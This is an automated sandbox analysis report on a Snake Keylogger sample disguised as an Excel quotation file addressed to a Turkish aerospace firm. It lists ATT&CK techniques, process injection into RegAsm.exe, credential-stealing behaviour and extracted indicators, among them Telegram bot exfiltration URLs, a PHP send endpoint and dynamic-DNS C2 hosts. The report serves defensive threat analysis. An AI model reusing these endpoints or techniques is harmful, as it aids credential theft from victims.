                  Source: Yara matchFile source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19004cb08.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000003.00000002.4017773009.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1669636704.000002A190007000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe PID: 6740, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3344, type: MEMORYSTR
                  Source: Yara matchFile source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19004cb08.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19008fb50.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19008fb50.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19004cb08.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000003.00000002.4017773009.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1669636704.000002A190007000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe PID: 6740, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3344, type: MEMORYSTR
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                  Native API
                  1
                  DLL Side-Loading
                  311
                  Process Injection
                  1
                  Disable or Modify Tools
                  1
                  OS Credential Dumping
                  121
                  Security Software Discovery
                  Remote Services1
                  Screen Capture
                  1
                  Web Service
                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                  DLL Side-Loading
                  41
                  Virtualization/Sandbox Evasion
                  1
                  Input Capture
                  1
                  Process Discovery
                  Remote Desktop Protocol1
                  Email Collection
                  11
                  Encrypted Channel
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)311
                  Process Injection
                  Security Account Manager41
                  Virtualization/Sandbox Evasion
                  SMB/Windows Admin Shares1
                  Input Capture
                  3
                  Ingress Tool Transfer
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                  Deobfuscate/Decode Files or Information
                  NTDS1
                  Application Window Discovery
                  Distributed Component Object Model11
                  Archive Collected Data
                  3
                  Non-Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
                  Obfuscated Files or Information
                  LSA Secrets1
                  System Network Configuration Discovery
                  SSH1
                  Data from Local System
                  14
                  Application Layer Protocol
                  Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  Software Packing
                  Cached Domain Credentials13
                  System Information Discovery
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  DLL Side-Loading
                  DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1574855 Sample: TEKL#U0130F #U0130STE#U011e... Startdate: 13/12/2024 Architecture: WINDOWS Score: 100 20 reallyfreegeoip.org 2->20 22 api.telegram.org 2->22 24 2 other IPs or domains 2->24 32 Found malware configuration 2->32 34 Malicious sample detected (through community Yara rule) 2->34 36 Multi AV Scanner detection for submitted file 2->36 42 11 other signatures 2->42 7 TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe 3 2->7         started        signatures3 38 Tries to detect the country of the analysis system (by using the IP) 20->38 40 Uses the Telegram API (likely for C&C communication) 22->40 process4 signatures5 44 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 7->44 46 Writes to foreign memory regions 7->46 48 Allocates memory in foreign processes 7->48 50 Injects a PE file into a foreign processes 7->50 10 RegAsm.exe 15 2 7->10         started        14 WerFault.exe 19 16 7->14         started        16 conhost.exe 7->16         started        18 RegAsm.exe 7->18         started        process6 dnsIp7 26 checkip.dyndns.com 132.226.8.169, 49704, 49711, 49715 UTMEMUS United States 10->26 28 api.telegram.org 149.154.167.220, 443, 49728 TELEGRAMRU United Kingdom 10->28 30 reallyfreegeoip.org 104.21.67.152, 443, 49706, 49709 CLOUDFLARENETUS United States 10->30 52 Tries to steal Mail credentials (via file / registry access) 10->52 54 Tries to harvest and steal browser information (history, passwords, etc) 10->54 signatures8

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe53%ReversingLabsWin64.Spyware.Snakekeylogger
                  TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe100%Joe Sandbox ML
                  No Antivirus matches
                  No Antivirus matches
                  No Antivirus matches
                  No Antivirus matches
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  reallyfreegeoip.org
                  104.21.67.152
                  truefalse
                    high
                    api.telegram.org
                    149.154.167.220
                    truefalse
                      high
                      checkip.dyndns.com
                      132.226.8.169
                      truefalse
                        high
                        checkip.dyndns.org
                        unknown
                        unknownfalse
                          high
                          NameMaliciousAntivirus DetectionReputation
                          https://reallyfreegeoip.org/xml/8.46.123.189false
                            high
                            https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:562258%0D%0ADate%20and%20Time:%2014/12/2024%20/%2016:26:30%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20562258%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                              high
                              http://checkip.dyndns.org/false
                                high
                                NameSourceMaliciousAntivirus DetectionReputation
                                https://www.office.com/RegAsm.exe, 00000003.00000002.4019025145.0000000003221000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4019025145.0000000003212000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://duckduckgo.com/chrome_newtabRegAsm.exe, 00000003.00000002.4021377725.0000000004051000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://duckduckgo.com/ac/?q=RegAsm.exe, 00000003.00000002.4021377725.0000000004051000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://api.telegram.orgRegAsm.exe, 00000003.00000002.4019025145.0000000003116000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://www.google.com/images/branding/product/ico/googleg_lodp.icoRegAsm.exe, 00000003.00000002.4021377725.0000000004051000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://api.telegram.org/botTEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1669636704.000002A190007000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4019025145.0000000003116000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4017773009.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                            high
                                            https://www.office.com/lBRegAsm.exe, 00000003.00000002.4019025145.000000000321C000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=RegAsm.exe, 00000003.00000002.4021377725.0000000004051000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://upx.sf.netAmcache.hve.7.drfalse
                                                  high
                                                  http://checkip.dyndns.orgRegAsm.exe, 00000003.00000002.4019025145.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=RegAsm.exe, 00000003.00000002.4021377725.0000000004051000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://api.telegram.org/bot/sendMessage?chat_id=&text=RegAsm.exe, 00000003.00000002.4019025145.0000000003116000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://chrome.google.com/webstore?hl=enRegAsm.exe, 00000003.00000002.4019025145.00000000031F0000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4019025145.0000000003221000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4019025145.00000000031E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://www.ecosia.org/newtab/RegAsm.exe, 00000003.00000002.4021377725.0000000004051000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://varders.kozow.com:8081TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1669636704.000002A190007000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4019025145.0000000003031000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4017773009.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                              high
                                                              http://aborters.duckdns.org:8081TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1669636704.000002A190007000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4019025145.0000000003031000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4017773009.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                high
                                                                https://ac.ecosia.org/autocomplete?q=RegAsm.exe, 00000003.00000002.4021377725.0000000004051000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://anotherarmy.dns.army:8081TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1669636704.000002A190007000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4019025145.0000000003031000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4017773009.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchRegAsm.exe, 00000003.00000002.4021377725.0000000004051000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://checkip.dyndns.org/qTEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1669636704.000002A190007000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4017773009.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://chrome.google.com/webstore?hl=enlBRegAsm.exe, 00000003.00000002.4019025145.00000000031EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://reallyfreegeoip.org/xml/8.46.123.189$RegAsm.exe, 00000003.00000002.4019025145.0000000003116000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4019025145.00000000030A9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4019025145.00000000030EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:562258%0D%0ADate%20aRegAsm.exe, 00000003.00000002.4019025145.0000000003116000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://reallyfreegeoip.orgRegAsm.exe, 00000003.00000002.4019025145.0000000003116000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4019025145.000000000307F000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4019025145.00000000030EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegAsm.exe, 00000003.00000002.4019025145.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=RegAsm.exe, 00000003.00000002.4021377725.0000000004051000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedTEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1669636704.000002A190007000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4017773009.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://reallyfreegeoip.org/xml/TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1669636704.000002A190007000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4017773009.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4019025145.000000000307F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        • No. of IPs < 25%
                                                                                        • 25% < No. of IPs < 50%
                                                                                        • 50% < No. of IPs < 75%
                                                                                        • 75% < No. of IPs
                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                        132.226.8.169
                                                                                        checkip.dyndns.comUnited States
                                                                                        16989UTMEMUSfalse
                                                                                        149.154.167.220
                                                                                        api.telegram.orgUnited Kingdom
                                                                                        62041TELEGRAMRUfalse
                                                                                        104.21.67.152
                                                                                        reallyfreegeoip.orgUnited States
                                                                                        13335CLOUDFLARENETUSfalse
                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                        Analysis ID:1574855
                                                                                        Start date and time:2024-12-13 17:46:13 +01:00
                                                                                        Joe Sandbox product:CloudBasic
                                                                                        Overall analysis duration:0h 8m 5s
                                                                                        Hypervisor based Inspection enabled:false
                                                                                        Report type:full
                                                                                        Cookbook file name:default.jbs
                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                        Number of analysed new started processes analysed:13
                                                                                        Number of new started drivers analysed:0
                                                                                        Number of existing processes analysed:0
                                                                                        Number of existing drivers analysed:0
                                                                                        Number of injected processes analysed:0
                                                                                        Technologies:
                                                                                        • HCA enabled
                                                                                        • EGA enabled
                                                                                        • AMSI enabled
                                                                                        Analysis Mode:default
                                                                                        Analysis stop reason:Timeout
                                                                                        Sample name:TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe
                                                                                        renamed because original name is a hash value
                                                                                        Original Sample Name:TEKLF STE - TUSA TRK HAVACILIK UZAY SANAY_xlsx.exe
                                                                                        Detection:MAL
                                                                                        Classification:mal100.troj.spyw.expl.evad.winEXE@7/5@3/3
                                                                                        EGA Information:
                                                                                        • Successful, ratio: 50%
                                                                                        HCA Information:
                                                                                        • Successful, ratio: 92%
                                                                                        • Number of executed functions: 69
                                                                                        • Number of non-executed functions: 3
                                                                                        Cookbook Comments:
                                                                                        • Found application associated with file extension: .exe
                                                                                        • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                        • Excluded IPs from analysis (whitelisted): 20.42.65.92, 20.190.181.5, 4.245.163.56, 20.109.210.53, 13.107.246.63
                                                                                        • Excluded domains from analysis (whitelisted): onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                        • Execution Graph export aborted for target RegAsm.exe, PID 3344 because it is empty
                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                        • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                        • VT rate limit hit for: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe
                                                                                        TimeTypeDescription
                                                                                        11:47:32API Interceptor10324803x Sleep call for process: RegAsm.exe modified
                                                                                        11:47:38API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        132.226.8.169HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                        • checkip.dyndns.org/
                                                                                        41570002689_20220814_05352297_HesapOzeti.exeGet hashmaliciousMassLogger RATBrowse
                                                                                        • checkip.dyndns.org/
                                                                                        malware.ps1Get hashmaliciousMassLogger RATBrowse
                                                                                        • checkip.dyndns.org/
                                                                                        Shipping Documents.exeGet hashmaliciousMassLogger RATBrowse
                                                                                        • checkip.dyndns.org/
                                                                                        QUOTES REQUEST FOR PRICES.exeGet hashmaliciousMassLogger RATBrowse
                                                                                        • checkip.dyndns.org/
                                                                                        Bank Swift and SOA PVRN0072700314080353_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                        • checkip.dyndns.org/
                                                                                        file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                        • checkip.dyndns.org/
                                                                                        ST07933.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                        • checkip.dyndns.org/
                                                                                        Price Quotation-01.dqy.dllGet hashmaliciousSnake KeyloggerBrowse
                                                                                        • checkip.dyndns.org/
                                                                                        ORDER-6070Y689_0PF57682456_DECVC789378909740.jsGet hashmaliciousWSHRat, Snake KeyloggerBrowse
                                                                                        • checkip.dyndns.org/
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        reallyfreegeoip.orgHSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                        • 104.21.67.152
                                                                                        77541373_BESOZT00_2024_99101234_1_4_1.exeGet hashmaliciousMassLogger RATBrowse
                                                                                        • 172.67.177.134
                                                                                        Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousMassLogger RATBrowse
                                                                                        • 172.67.177.134
                                                                                        TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 172.67.177.134
                                                                                        Request for Quotations and specifications.pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                                        • 104.21.67.152
                                                                                        hesaphareketi-01.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                        • 104.21.67.152
                                                                                        hesaphareketi-01.pdfsxlx..exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                        • 104.21.67.152
                                                                                        41570002689_20220814_05352297_HesapOzeti.exeGet hashmaliciousMassLogger RATBrowse
                                                                                        • 104.21.67.152
                                                                                        malware.ps1Get hashmaliciousMassLogger RATBrowse
                                                                                        • 104.21.67.152
                                                                                        Shipping Documents.exeGet hashmaliciousMassLogger RATBrowse
                                                                                        • 104.21.67.152
                                                                                        api.telegram.orgHSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                        • 149.154.167.220
                                                                                        888.exeGet hashmaliciousLuca StealerBrowse
                                                                                        • 149.154.167.220
                                                                                        888.exeGet hashmaliciousLuca StealerBrowse
                                                                                        • 149.154.167.220
                                                                                        https://grizzled-overjoyed-bag.glitch.me/#comercial.portugal@eurofred.comGet hashmaliciousHTMLPhisherBrowse
                                                                                        • 149.154.167.220
                                                                                        XClient.exeGet hashmaliciousXWormBrowse
                                                                                        • 149.154.167.220
                                                                                        file.exeGet hashmaliciousDiscord Token Stealer, Millenuim RATBrowse
                                                                                        • 149.154.167.220
                                                                                        Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousMassLogger RATBrowse
                                                                                        • 149.154.167.220
                                                                                        installer.exeGet hashmaliciousUnknownBrowse
                                                                                        • 149.154.167.220
                                                                                        installer.exeGet hashmaliciousUnknownBrowse
                                                                                        • 149.154.167.220
                                                                                        file.exeGet hashmaliciousUnknownBrowse
                                                                                        • 149.154.167.220
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        TELEGRAMRUfile.exeGet hashmaliciousAmadeyBrowse
                                                                                        • 149.154.167.99
                                                                                        HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                        • 149.154.167.220
                                                                                        888.exeGet hashmaliciousLuca StealerBrowse
                                                                                        • 149.154.167.220
                                                                                        888.exeGet hashmaliciousLuca StealerBrowse
                                                                                        • 149.154.167.220
                                                                                        https://grizzled-overjoyed-bag.glitch.me/#comercial.portugal@eurofred.comGet hashmaliciousHTMLPhisherBrowse
                                                                                        • 149.154.167.220
                                                                                        XClient.exeGet hashmaliciousXWormBrowse
                                                                                        • 149.154.167.220
                                                                                        file.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                        • 149.154.167.99
                                                                                        file.exeGet hashmaliciousDiscord Token Stealer, Millenuim RATBrowse
                                                                                        • 149.154.167.220
                                                                                        file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                        • 149.154.167.99
                                                                                        file.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                        • 149.154.167.99
                                                                                        UTMEMUSHSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                        • 132.226.8.169
                                                                                        41570002689_20220814_05352297_HesapOzeti.exeGet hashmaliciousMassLogger RATBrowse
                                                                                        • 132.226.8.169
                                                                                        malware.ps1Get hashmaliciousMassLogger RATBrowse
                                                                                        • 132.226.8.169
                                                                                        Shipping Documents.exeGet hashmaliciousMassLogger RATBrowse
                                                                                        • 132.226.8.169
                                                                                        QUOTES REQUEST FOR PRICES.exeGet hashmaliciousMassLogger RATBrowse
                                                                                        • 132.226.8.169
                                                                                        Bank Swift and SOA PVRN0072700314080353_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                        • 132.226.8.169
                                                                                        DEC 2024 RFQ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 132.226.247.73
                                                                                        file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                        • 132.226.8.169
                                                                                        Request for quote.docGet hashmaliciousSnake KeyloggerBrowse
                                                                                        • 132.226.247.73
                                                                                        ST07933.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                        • 132.226.8.169
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        54328bd36c14bd82ddaa0c04b25ed9adHSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                        • 104.21.67.152
                                                                                        77541373_BESOZT00_2024_99101234_1_4_1.exeGet hashmaliciousMassLogger RATBrowse
                                                                                        • 104.21.67.152
                                                                                        Bloxflip Predictor.exeGet hashmaliciousNjratBrowse
                                                                                        • 104.21.67.152
                                                                                        CVmkXJ7e0a.exeGet hashmaliciousSheetRatBrowse
                                                                                        • 104.21.67.152
                                                                                        Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousMassLogger RATBrowse
                                                                                        • 104.21.67.152
                                                                                        TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 104.21.67.152
                                                                                        Request for Quotations and specifications.pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                                        • 104.21.67.152
                                                                                        hesaphareketi-01.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                        • 104.21.67.152
                                                                                        hesaphareketi-01.pdfsxlx..exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                        • 104.21.67.152
                                                                                        41570002689_20220814_05352297_HesapOzeti.exeGet hashmaliciousMassLogger RATBrowse
                                                                                        • 104.21.67.152
                                                                                        3b5074b1b5d032e5620f69f9f700ff0eadv.ps1Get hashmaliciousLummaCBrowse
                                                                                        • 149.154.167.220
                                                                                        d2W4YpqsKg.lnkGet hashmaliciousLummaCBrowse
                                                                                        • 149.154.167.220
                                                                                        HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                        • 149.154.167.220
                                                                                        https://nam.dcv.ms/0CX72IqyxfGet hashmaliciousHTMLPhisherBrowse
                                                                                        • 149.154.167.220
                                                                                        https://go.eu.sparkpostmail1.com/f/a/IgPiUnQgGsgttR90IQc-hw~~/AAGCxAA~/RgRpOpvrP0QqaHR0cHM6Ly9tYXNzd29vZHBvbGlzaC5pbi93YXRlci9jb2xkL2luZGV4VwVzcGNldUIKZ1XrFlhnca8zKlISemFyZ2FyQGZhcmlkZWEuY29tWAQAAAAB#YmlsbC5ob2l0dEBwYXJ0bmVyc21ndS5jb20=Get hashmaliciousHTMLPhisherBrowse
                                                                                        • 149.154.167.220
                                                                                        pxGom77XRW.docGet hashmaliciousUnknownBrowse
                                                                                        • 149.154.167.220
                                                                                        GSAT3WdrJ8.docGet hashmaliciousUnknownBrowse
                                                                                        • 149.154.167.220
                                                                                        YRhWQcRXWV.docGet hashmaliciousUnknownBrowse
                                                                                        • 149.154.167.220
                                                                                        FINAL_PDF.exeGet hashmaliciousUnknownBrowse
                                                                                        • 149.154.167.220
                                                                                        Filezilla.exeGet hashmaliciousUnknownBrowse
                                                                                        • 149.154.167.220
                                                                                        No context
                                                                                        Process:C:\Windows\System32\WerFault.exe
                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):65536
                                                                                        Entropy (8bit):1.0595186097257405
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:gvsf6XXSXSNd5/0UnUhSvSbaWB2WPzuiFJ3Z24lO8pSj:J6X1dSUnUVam24zuiFJ3Y4lO8e
                                                                                        MD5:6A327E1D323E65C3635D9F70FBD12837
                                                                                        SHA1:455532DBF8CA1281227F08B49881691DD64014CF
                                                                                        SHA-256:3C08F75F991470E8204EC380C828768C9410E9F7F4E9049BA215622C3F8CDCFB
                                                                                        SHA-512:E5AF78A2FCA5E3825663679CEF2D93116EEA8DC01669B2F51903B8A2846D3A82D8BFE017C68254465A3EBEF25B1C5B673CDC13816E9CC183B3CC923C81951A12
                                                                                        Malicious:false
                                                                                        Reputation:low
